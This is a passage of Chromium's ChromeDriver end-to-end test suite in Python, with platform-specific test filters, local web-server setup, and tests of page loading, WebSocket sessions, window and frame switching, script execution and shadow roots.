#!/usr/bin/env python # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """End to end tests for ChromeDriver.""" # Note that to run Android tests you must have the following line in # .gclient (in the parent directory of src): target_os = [ 'android' ] # to get the appropriate adb version for ChromeDriver. # TODO (crbug.com/857239): Remove above comment when adb version # is updated in Devil. from __future__ import print_function from __future__ import absolute_import import base64 import json import math import optparse import os import re import shutil import socket import subprocess import sys import tempfile import threading import time import unittest import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error import six.moves.urllib.request, six.moves.urllib.error, six.moves.urllib.parse import uuid import imghdr import struct from six.moves import map from six.moves import range from six.moves import zip _THIS_DIR = os.path.abspath(os.path.dirname(__file__)) _PARENT_DIR = os.path.join(_THIS_DIR, os.pardir) _CLIENT_DIR = os.path.join(_PARENT_DIR, "client") _SERVER_DIR = os.path.join(_PARENT_DIR, "server") _TEST_DIR = os.path.join(_PARENT_DIR, "test") sys.path.insert(1, _PARENT_DIR) import chrome_paths import util sys.path.remove(_PARENT_DIR) sys.path.insert(1, _CLIENT_DIR) import chromedriver import websocket_connection import webelement import webshadowroot sys.path.remove(_CLIENT_DIR) sys.path.insert(1, _SERVER_DIR) import server sys.path.remove(_SERVER_DIR) sys.path.insert(1, _TEST_DIR) import unittest_util import webserver sys.path.remove(_TEST_DIR) sys.path.insert(0,os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'third_party', 'gsutil', 'third_party', 'monotonic')) from monotonic import monotonic _TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver') if util.IsLinux(): sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'devil')) from devil.android import device_utils from devil.android import forwarder sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android')) import devil_chromium from pylib import constants _NEGATIVE_FILTER = [ # This test is too flaky on the bots, but seems to run perfectly fine # on developer workstations. 'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsSpeed', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=833 'ChromeDriverTest.testAlertOnNewWindow', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2532 'ChromeDriverPageLoadTimeoutTest.testRefreshWithPageLoadTimeout', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3517 'ChromeDriverTest.testPrint', 'ChromeDriverTest.testPrintInvalidArgument', ] _OS_SPECIFIC_FILTER = {} _OS_SPECIFIC_FILTER['win'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=299 'ChromeLogPathCapabilityTest.testChromeLogPath', # https://bugs.chromium.org/p/chromium/issues/detail?id=1196363 'ChromeDownloadDirTest.testFileDownloadAfterTabHeadless', 'ChromeDownloadDirTest.testFileDownloadWithClickHeadless', 'ChromeDownloadDirTest.testFileDownloadWithGetHeadless', 'HeadlessChromeDriverTest.testNewTabDoesNotFocus', 'HeadlessChromeDriverTest.testNewWindowDoesNotFocus', 'HeadlessChromeDriverTest.testPrintHeadless', 'HeadlessChromeDriverTest.testPrintInvalidArgumentHeadless', 'HeadlessChromeDriverTest.testWindowFullScreen', 'HeadlessInvalidCertificateTest.testLoadsPage', 'HeadlessInvalidCertificateTest.testNavigateNewWindow', 'RemoteBrowserTest.testConnectToRemoteBrowserLiteralAddressHeadless', ] _OS_SPECIFIC_FILTER['linux'] = [ ] _OS_SPECIFIC_FILTER['mac'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1927 # https://crbug.com/1036636 'MobileEmulationCapabilityTest.testTapElement', # https://bugs.chromium.org/p/chromium/issues/detail?id=1011225 'ChromeDriverTest.testActionsMultiTouchPoint', # Flaky: https://crbug.com/1156576. 'ChromeDriverTestLegacy.testContextMenuEventFired', # Flaky: https://crbug.com/1157533. 'ChromeDriverTest.testShadowDomFindElement', ] _DESKTOP_NEGATIVE_FILTER = [ # Desktop doesn't support touch (without --touch-events). 'ChromeDriverTestLegacy.testTouchSingleTapElement', 'ChromeDriverTest.testTouchDownMoveUpElement', 'ChromeDriverTestLegacy.testTouchScrollElement', 'ChromeDriverTestLegacy.testTouchDoubleTapElement', 'ChromeDriverTestLegacy.testTouchLongPressElement', 'ChromeDriverTest.testTouchFlickElement', 'ChromeDriverAndroidTest.*', ] _INTEGRATION_NEGATIVE_FILTER = [ # The following test is flaky on Windows and Mac. 'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences', # ChromeDriverLogTest tests an internal ChromeDriver feature, not needed # for integration test. 'ChromeDriverLogTest.*', # ChromeDriverPageLoadTimeoutTest is flaky, particularly on Mac. 'ChromeDriverPageLoadTimeoutTest.*', # Some trivial test cases that provide no additional value beyond what are # already tested by other test cases. 'ChromeDriverTest.testGetCurrentWindowHandle', 'ChromeDriverTest.testStartStop', # PerfTest takes a long time, requires extra setup, and adds little value # to integration testing. 'PerfTest.*', # Flaky: https://crbug.com/899919 'SessionHandlingTest.testGetSessions', # Flaky due to occasional timeout in starting Chrome 'ZChromeStartRetryCountTest.testChromeStartRetryCount', ] def _GetDesktopNegativeFilter(): filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER os = util.GetPlatformName() if os in _OS_SPECIFIC_FILTER: filter += _OS_SPECIFIC_FILTER[os] return filter _ANDROID_NEGATIVE_FILTER = {} _ANDROID_NEGATIVE_FILTER['chrome'] = ( _NEGATIVE_FILTER + [ # Android doesn't support switches and extensions. 'ChromeSwitchesCapabilityTest.*', 'ChromeExtensionsCapabilityTest.*', 'MobileEmulationCapabilityTest.*', 'ChromeDownloadDirTest.*', # https://crbug.com/274650 'ChromeDriverTest.testCloseWindow', # Most window operations don't make sense on Android. 'ChromeDriverTest.testWindowFullScreen', 'ChromeDriverTest.testWindowPosition', 'ChromeDriverTest.testWindowSize', 'ChromeDriverTest.testWindowRect', 'ChromeDriverTest.testWindowMaximize', 'ChromeDriverTest.testWindowMinimize', 'ChromeLogPathCapabilityTest.testChromeLogPath', # Connecting to running browser is not supported on Android. 'RemoteBrowserTest.*', # Don't enable perf testing on Android yet. 'PerfTest.*', # Android doesn't support multiple sessions on one device. 'SessionHandlingTest.testGetSessions', # Android doesn't use the chrome://print dialog. 'ChromeDriverTest.testCanSwitchToPrintPreviewDialog', # Chrome 44+ for Android doesn't dispatch the dblclick event 'ChromeDriverTest.testMouseDoubleClick', # Page cannot be loaded from file:// URI in Android unless it # is stored in device. 'ChromeDriverTest.testCanClickAlertInIframes', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2081 'ChromeDriverTest.testCloseWindowUsingJavascript', # Android doesn't support headless mode 'HeadlessInvalidCertificateTest.*', 'HeadlessChromeDriverTest.*', # Tests of the desktop Chrome launch process. 'LaunchDesktopTest.*', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2737 'ChromeDriverTest.testTakeElementScreenshot', 'ChromeDriverTest.testTakeElementScreenshotPartlyVisible', 'ChromeDriverTest.testTakeElementScreenshotInIframe', # setWindowBounds not supported on Android 'ChromeDriverTest.testTakeLargeElementScreenshot', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2786 'ChromeDriverTest.testActionsTouchTap', 'ChromeDriverTest.testTouchDownMoveUpElement', 'ChromeDriverTest.testTouchFlickElement', # Android has no concept of tab or window, and will always lose focus # on tab creation. https://crbug.com/chromedriver/3018 'ChromeDriverTest.testNewWindowDoesNotFocus', 'ChromeDriverTest.testNewTabDoesNotFocus', # Android does not support the virtual authenticator environment. 'ChromeDriverSecureContextTest.*', # Covered by Desktop tests; can't create 2 browsers in Android 'SupportIPv4AndIPv6.testSupportIPv4AndIPv6', # Browser context management is not supported by Android 'ChromeDriverTest.testClipboardPermissions', 'ChromeDriverTest.testMidiPermissions', 'ChromeDriverTest.testMultiplePermissions', 'ChromeDriverTest.testNewWindowSameDomainHasSamePermissions', 'ChromeDriverTest.testPermissionStates', 'ChromeDriverTest.testPermissionsOpaqueOriginsThrowError', 'ChromeDriverTest.testPermissionsSameOrigin', 'ChromeDriverTest.testPermissionsSameOriginDoesNotAffectOthers', 'ChromeDriverTest.testPersistentStoragePermissions', 'ChromeDriverTest.testPushAndNotificationsPermissions', 'ChromeDriverTest.testSensorPermissions', 'ChromeDriverTest.testSettingPermissionDoesNotAffectOthers', # Android does not allow changing window size 'JavaScriptTests.*', # These tests are failing on Android # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3560 'ChromeDriverTest.testTakeLargeElementViewportScreenshot', 'ChromeDriverTest.testTakeLargeElementFullPageScreenshot' ] ) _ANDROID_NEGATIVE_FILTER['chrome_stable'] = ( _ANDROID_NEGATIVE_FILTER['chrome'] + [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350 'ChromeDriverTest.testSlowIFrame', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503 'ChromeDriverTest.testGetLogOnClosedWindow', 'ChromeDriverTest.testGetWindowHandles', 'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly', 'ChromeDriverTest.testSwitchToWindow', # Feature not yet supported in this version 'ChromeDriverTest.testGenerateTestReport', ] ) _ANDROID_NEGATIVE_FILTER['chrome_beta'] = ( _ANDROID_NEGATIVE_FILTER['chrome'] + [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503 'ChromeDriverTest.testGetLogOnClosedWindow', 'ChromeDriverTest.testGetWindowHandles', 'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly', 'ChromeDriverTest.testSwitchToWindow', # Feature not yet supported in this version 'ChromeDriverTest.testGenerateTestReport', ] ) _ANDROID_NEGATIVE_FILTER['chromium'] = ( _ANDROID_NEGATIVE_FILTER['chrome'] + [] ) _ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = ( _ANDROID_NEGATIVE_FILTER['chrome_stable'] + [ # WebView doesn't support emulating network conditions. 'ChromeDriverTest.testEmulateNetworkConditions', 'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsOffline', 'ChromeDriverTest.testEmulateNetworkConditionsSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsName', # WebView shell doesn't support popups or popup blocking. 'ChromeDriverTest.testPopups', 'ChromeDriverTest.testDontGoBackOrGoForward', # ChromeDriver WebView shell doesn't support multiple tabs. 'ChromeDriverTest.testCloseWindowUsingJavascript', 'ChromeDriverTest.testGetWindowHandles', 'ChromeDriverTest.testSwitchToWindow', 'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly', 'ChromeDriverTest.testGetLogOnClosedWindow', # The WebView shell that we test against (on KitKat) does not perform # cross-process navigations. # TODO(samuong): reenable when it does. 'ChromeDriverPageLoadTimeoutTest.testPageLoadTimeoutCrossDomain', 'ChromeDriverPageLoadTimeoutTest.' 'testHistoryNavigationWithPageLoadTimeout', # Webview shell doesn't support Alerts. 'ChromeDriverTest.testAlert', 'ChromeDriverTest.testAlertOnNewWindow', 'ChromeDesiredCapabilityTest.testUnexpectedAlertBehaviour', 'ChromeDriverTest.testAlertHandlingOnPageUnload', 'ChromeDriverTest.testClickElementAfterNavigation', 'ChromeDriverTest.testGetLogOnWindowWithAlert', 'ChromeDriverTest.testSendTextToAlert', 'ChromeDriverTest.testUnexpectedAlertOpenExceptionMessage', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2332 'ChromeDriverTestLegacy.testTouchScrollElement', ] ) class ChromeDriverBaseTest(unittest.TestCase): """Base class for testing chromedriver functionalities.""" def __init__(self, *args, **kwargs): super(ChromeDriverBaseTest, self).__init__(*args, **kwargs) self._drivers = [] def tearDown(self): for driver in self._drivers: try: driver.Quit() except: pass def CreateDriver(self, server_url=None, server_pid=None, download_dir=None, **kwargs): if server_url is None: server_url = _CHROMEDRIVER_SERVER_URL if server_pid is None: server_pid = _CHROMEDRIVER_SERVER_PID if (not _ANDROID_PACKAGE_KEY and 'debugger_address' not in kwargs and '_MINIDUMP_PATH' in globals() and _MINIDUMP_PATH): # Environment required for minidump not supported on Android # minidumpPath will fail parsing if debugger_address is set if 'experimental_options' in kwargs: if 'minidumpPath' not in kwargs['experimental_options']: kwargs['experimental_options']['minidumpPath'] = _MINIDUMP_PATH else: kwargs['experimental_options'] = {'minidumpPath': _MINIDUMP_PATH} android_package = None android_activity = None android_process = None if _ANDROID_PACKAGE_KEY: android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell': android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity android_process = '%s:main' % android_package driver = chromedriver.ChromeDriver(server_url, server_pid, chrome_binary=_CHROME_BINARY, android_package=android_package, android_activity=android_activity, android_process=android_process, download_dir=download_dir, test_name=self.id(), **kwargs) self._drivers += [driver] return driver def WaitForNewWindow(self, driver, old_handles, check_closed_windows=True): """Wait for at least one new window to show up in 20 seconds. Args: old_handles: Handles to all old windows before the new window is added. check_closed_windows: If True, assert that no windows are closed before the new window is added. Returns: Handle to a new window. None if timeout. """ deadline = monotonic() + 20 while monotonic() < deadline: handles = driver.GetWindowHandles() if check_closed_windows: self.assertTrue(set(old_handles).issubset(handles)) new_handles = set(handles).difference(set(old_handles)) if len(new_handles) > 0: return new_handles.pop() time.sleep(0.01) return None def WaitForCondition(self, predicate, timeout=5, timestep=0.1): """Wait for a condition to become true. Args: predicate: A function that returns a boolean value. """ deadline = monotonic() + timeout while monotonic() < deadline: if predicate(): return True time.sleep(timestep) return False class ChromeDriverBaseTestWithWebServer(ChromeDriverBaseTest): @staticmethod def GlobalSetUp(): ChromeDriverBaseTestWithWebServer._http_server = webserver.WebServer( chrome_paths.GetTestData()) ChromeDriverBaseTestWithWebServer._sync_server = webserver.SyncWebServer() cert_path = os.path.join(chrome_paths.GetTestData(), 'chromedriver/invalid_ssl_cert.pem') ChromeDriverBaseTestWithWebServer._https_server = webserver.WebServer( chrome_paths.GetTestData(), cert_path) def respondWithUserAgentString(request): return {}, """ <html> <body>%s</body> </html>""" % request.GetHeader('User-Agent') def respondWithUserAgentStringUseDeviceWidth(request): return {}, """ <html> <head> <meta name="viewport" content="width=device-width,minimum-scale=1.0"> </head> <body>%s</body> </html>""" % request.GetHeader('User-Agent') ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath( '/userAgent', respondWithUserAgentString) ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath( '/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth) if _ANDROID_PACKAGE_KEY: ChromeDriverBaseTestWithWebServer._device = ( device_utils.DeviceUtils.HealthyDevices()[0]) http_host_port = ( ChromeDriverBaseTestWithWebServer._http_server._server.server_port) sync_host_port = ( ChromeDriverBaseTestWithWebServer._sync_server._server.server_port) https_host_port = ( ChromeDriverBaseTestWithWebServer._https_server._server.server_port) forwarder.Forwarder.Map( [(http_host_port, http_host_port), (sync_host_port, sync_host_port), (https_host_port, https_host_port)], ChromeDriverBaseTestWithWebServer._device) @staticmethod def GlobalTearDown(): if _ANDROID_PACKAGE_KEY: forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device) ChromeDriverBaseTestWithWebServer._http_server.Shutdown() ChromeDriverBaseTestWithWebServer._https_server.Shutdown() @staticmethod def GetHttpUrlForFile(file_path): return ChromeDriverBaseTestWithWebServer._http_server.GetUrl() + file_path class ChromeDriverTestWithCustomCapability(ChromeDriverBaseTestWithWebServer): def testEagerMode(self): send_response = threading.Event() def waitAndRespond(): send_response.wait(10) self._sync_server.RespondWithContent('#') thread = threading.Thread(target=waitAndRespond) self._http_server.SetDataForPath('/top.html', """ <html><body> <div id='top'> <img src='%s'> </div> </body></html>""" % self._sync_server.GetUrl()) eager_driver = self.CreateDriver(page_load_strategy='eager') thread.start() start_eager = monotonic() eager_driver.Load(self._http_server.GetUrl() + '/top.html') stop_eager = monotonic() send_response.set() eager_time = stop_eager - start_eager self.assertTrue(eager_time < 9) thread.join() def testDoesntWaitWhenPageLoadStrategyIsNone(self): class HandleRequest(object): def __init__(self): self.sent_hello = threading.Event() def slowPage(self, request): self.sent_hello.wait(2) return {}, """ <html> <body>hello</body> </html>""" handler = HandleRequest() self._http_server.SetCallbackForPath('/slow', handler.slowPage) driver = self.CreateDriver(page_load_strategy='none') self.assertEquals('none', driver.capabilities['pageLoadStrategy']) driver.Load(self._http_server.GetUrl() + '/chromedriver/empty.html') start = monotonic() driver.Load(self._http_server.GetUrl() + '/slow') self.assertTrue(monotonic() - start < 2) handler.sent_hello.set() self.WaitForCondition(lambda: 'hello' in driver.GetPageSource()) self.assertTrue('hello' in driver.GetPageSource()) def testUnsupportedPageLoadStrategyRaisesException(self): self.assertRaises(chromedriver.InvalidArgument, self.CreateDriver, page_load_strategy="unsupported") def testGetUrlOnInvalidUrl(self): # Make sure we don't return 'chrome-error://chromewebdata/' (see # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1272). # Block DNS resolution for all hosts so that the navigation results # in a DNS lookup error. driver = self.CreateDriver( chrome_switches=['--host-resolver-rules=MAP * ~NOTFOUND']) self.assertRaises(chromedriver.ChromeDriverException, driver.Load, 'http://invalid/') self.assertEquals('http://invalid/', driver.GetCurrentUrl()) class ChromeDriverWebSocketTest(ChromeDriverBaseTestWithWebServer): @staticmethod def composeWebSocketUrl(server_url, session_id): return server_url.replace('http', 'ws') + '/session/' + session_id def testDefaultSession(self): driver = self.CreateDriver() self.assertFalse('webSocketUrl' in driver.capabilities) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketUrlFalse(self): driver = self.CreateDriver(web_socket_url=False) self.assertFalse('webSocketUrl' in driver.capabilities) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketUrlTrue(self): driver = self.CreateDriver(web_socket_url=True) self.assertTrue('webSocketUrl' in driver.capabilities) self.assertNotEqual(None, driver.GetSessionId()) self.assertEquals(driver.capabilities['webSocketUrl'], self.composeWebSocketUrl(_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) def testWebSocketUrlInvalid(self): self.assertRaises(chromedriver.InvalidArgument, self.CreateDriver, web_socket_url='Invalid') def testWebSocketOneConnectionPerSession(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketCommandReturnsNotSupported(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) websocket.SendCommand({"SOME": "COMMAND"}) message = websocket.ReadMessage() self.assertEqual("not supported", message) def testWebSocketInvalidSessionId(self): driver = self.CreateDriver(web_socket_url=True) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, "random_session_id_123") def testWebSocketClosedCanReconnect(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) websocket.Close() websocket2 = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket2) class ChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver() def testStartStop(self): pass def testGetComputedAttributes(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) firstHeaderElement = self._driver.FindElement( 'css selector', '#first-header') self.assertEquals(firstHeaderElement.GetComputedLabel(), 'header content') self.assertEquals(firstHeaderElement.GetComputedRole(), 'heading') def testGetComputedAttributesForIgnoredNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) ignoredHeaderElement = self._driver.FindElement( 'css selector', '#ignored-header') # GetComputedLabel for ignored node should return empty string. self.assertEquals(ignoredHeaderElement.GetComputedLabel(), '') self.assertEquals(ignoredHeaderElement.GetComputedRole(), 'none') def testGetComputedAttributesForUnrenderedNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) unrenderedHeaderElement = self._driver.FindElement( 'css selector', '#unrendered-header') # GetComputedLabel for unrendered node should return empty string. self.assertEquals(unrenderedHeaderElement.GetComputedLabel(), '') self.assertEquals(unrenderedHeaderElement.GetComputedRole(), 'none') def testLoadUrl(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) def testGetCurrentWindowHandle(self): self._driver.GetCurrentWindowHandle() # crbug.com/p/chromedriver/issues/detail?id=2995 exposed that some libraries # introduce circular function references. Functions should not be serialized # or treated as an object - this test checks that circular function # definitions are allowed (despite how they are not spec-compliant. def testExecuteScriptWithSameFunctionReference(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript("""function copyMe() { return 1; } Function.prototype.foo = copyMe; const obj = {}; obj['buzz'] = copyMe; return obj;""") def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testCloseWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') close_returned_handles = self._driver.CloseWindow() self.assertRaises(chromedriver.NoSuchWindow, self._driver.GetCurrentWindowHandle) new_handles = self._driver.GetWindowHandles() self.assertEquals(close_returned_handles, new_handles) for old_handle in old_handles: self.assertTrue(old_handle in new_handles) for handle in new_handles: self._driver.SwitchToWindow(handle) self.assertEquals(handle, self._driver.GetCurrentWindowHandle()) close_handles = self._driver.CloseWindow() # CloseWindow quits the session if on the last window. if handle is not new_handles[-1]: from_get_window_handles = self._driver.GetWindowHandles() self.assertEquals(close_handles, from_get_window_handles) def testCloseWindowUsingJavascript(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') self._driver.ExecuteScript('window.close()') with self.assertRaises(chromedriver.NoSuchWindow): self._driver.GetTitle() def testGetWindowHandles(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.assertNotEqual(None, self.WaitForNewWindow(self._driver, old_handles)) def testGetWindowHandlesInPresenceOfSharedWorker(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/shared_worker.html')) old_handles = self._driver.GetWindowHandles() def testSwitchToWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertEquals( 1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;')) window1_handle = self._driver.GetCurrentWindowHandle() old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') self._driver.SwitchToWindow('oldWindow') self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle()) def testEvaluateScript(self): self.assertEquals(1, self._driver.ExecuteScript('return 1')) self.assertEquals(None, self._driver.ExecuteScript('')) def testEvaluateScriptWithArgs(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) script = ('document.body.innerHTML = "<div>b</div><div>c</div>";' 'return {stuff: document.querySelectorAll("div")};') stuff = self._driver.ExecuteScript(script)['stuff'] script = 'return arguments[0].innerHTML + arguments[1].innerHTML' self.assertEquals( 'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1])) def testEvaluateInvalidScript(self): self.assertRaises(chromedriver.ChromeDriverException, self._driver.ExecuteScript, '{{{') def testExecuteAsyncScript(self): self._driver.SetTimeouts({'script': 3000}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteAsyncScript, 'var callback = arguments[0];' 'setTimeout(function(){callback(1);}, 10000);') self.assertEquals( 2, self._driver.ExecuteAsyncScript( 'var callback = arguments[0];' 'setTimeout(function(){callback(2);}, 300);')) def testExecuteScriptTimeout(self): self._driver.SetTimeouts({'script': 0}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteScript, 'return 2') # Regular script can still run afterwards. self._driver.SetTimeouts({'script': 1000}) self.assertEquals( 4, self._driver.ExecuteScript('return 4')) def testSwitchToFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('name') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrameByIndex(0) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe')) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) def testSwitchToParentFrame(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Three' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('One' in self._driver.GetPageSource()) def testSwitchToNestedFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/nested_frameset.html')) self._driver.SwitchToFrameByIndex(0) self._driver.FindElement("css selector", "#link") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('2Frame') self._driver.FindElement("css selector", "#l1") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('fourth_frame') self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToMainFrame() self._driver.SwitchToFrameByIndex(4) self._driver.FindElement("css selector", "#aa1") def testExecuteInRemovedFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);' 'window.addEventListener("message",' ' function(event) { document.body.removeChild(frame); });') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.ExecuteScript('parent.postMessage("remove", "*");') self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) def testSwitchToStaleFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') element = self._driver.FindElement("css selector", "#id") self._driver.SwitchToFrame(element) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) with self.assertRaises(chromedriver.StaleElementReference): self._driver.SwitchToFrame(element) def testGetTitle(self): script = 'document.title = "title"; return 1;' self.assertEquals(1, self._driver.ExecuteScript(script)) self.assertEquals('title', self._driver.GetTitle()) def testGetPageSource(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertTrue('Link to empty.html' in self._driver.GetPageSource()) def testGetElementShadowRoot(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) def testGetElementShadowRootNotExists(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'div') with self.assertRaises(chromedriver.NoSuchShadowRoot): element.GetElementShadowRoot() def testFindElementFromShadowRoot(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, 